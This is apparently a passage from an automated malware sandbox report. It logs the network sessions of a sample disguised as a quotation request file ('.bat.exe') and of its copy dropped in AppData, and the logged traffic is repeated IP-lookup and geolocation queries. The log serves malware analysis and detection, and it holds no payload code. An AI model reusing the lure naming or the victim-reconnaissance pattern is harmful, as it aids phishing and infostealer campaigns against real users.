Nov 20, 2024 09:33:06.344805002 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:06.502743959 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:06 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 834b8cd65762e6c04d9a4f1220af61fb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:07.136194944 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:07.719619989 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5121e5a452757addb9276bf35aa8549c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49715	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:08.383829117 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:08.983076096 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:08 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7717254faafbb1f181484487840ee0a2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:09.432219028 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:10.016171932 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 72ced0b97171ec682307d9bef137544b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 09:33:10.019756079 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:10.177064896 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cea2a84dc5a0f347b2b96638a6518dca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 20, 2024 09:33:10.987672091 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:11.148333073 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8269921bf29e18c97eea0d7f13256ac0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:09.615515947 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:10.178440094 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eb45a2bd28bf5e9653e151d1d60f74b1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:10.815464020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:11.378704071 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 916a1d0fb7b8bf21f5ac1dce3d6ff030 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49724	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:11.772047997 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 20, 2024 09:33:12.335205078 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f5bd67b97927f703f528be71a2b76a0e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49725	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:12.024102926 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:12.600101948 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 41911c4174855dfb23e226c792ba66b6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49728	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:12.957039118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:13.549091101 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3462dc0d17cfb73f447a2eb0d508e9c7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49729	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:13.291140079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:13.953402042 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b411286227d429fc3b8bd571f7112314 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49732	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:14.179128885 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:14.743051052 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 336a51fbc21351deb401238b76286894 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49733	158.101.44.242	80	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:14.586076975 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:15.163778067 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d9c76760b5210408360d03a08acdb6bf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49736	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:15.381143093 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:15.979320049 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8defebf625335ed2872d9a420da53c4e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49739	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:16.630717993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:17.197326899 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:17 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f452fee9286ddd59b2bbeee3577e80b5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49743	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:17.805315018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:18.400226116 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2947a0e29c71693db4a52fef4bed56d0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49753	158.101.44.242	80	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 09:33:19.165551901 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 20, 2024 09:33:19.734417915 CET	320	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bfcf91c40ed20faace8a55875351f40d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49709	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:06 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:06 UTC	850	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:06 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55495 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eg1THk%2BeMbwG73IKUu2gSkClq0VmAA1AIiaTqiWkC9zfEqdPLoWL8o41%2BbSVd6QbaI609oGcNTOpWe3xxdVyjxCNe8ktbibl36k6NNA2xDm18LXi%2BYvNao3DqjCaWkx3jC2gPiix"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717de3dcd41bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2508&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1170809&cwnd=203&unsent_bytes=0&cid=7819ad9fcb749890&ts=421&x=0"
2024-11-20 08:33:06 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49710	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:06 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:07 UTC	858	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:07 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55496 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ReX7GAm8TLJ8eqwIEsrWzGxi3AysPPpzp9R%2Fk24QFKWmHC3LclkVk92Q42GuXiHKtaCVOgKY5SIJaP7K%2FjMhS8mazWUXpJBjdS154pA7%2FThWGKJ7EbLe%2BiyxI%2FV%2FaSYu1giKD8v%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5717e31ae117ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1456&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1974306&cwnd=171&unsent_bytes=0&cid=be25d0500fbc3a35&ts=140&x=0"
2024-11-20 08:33:07 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
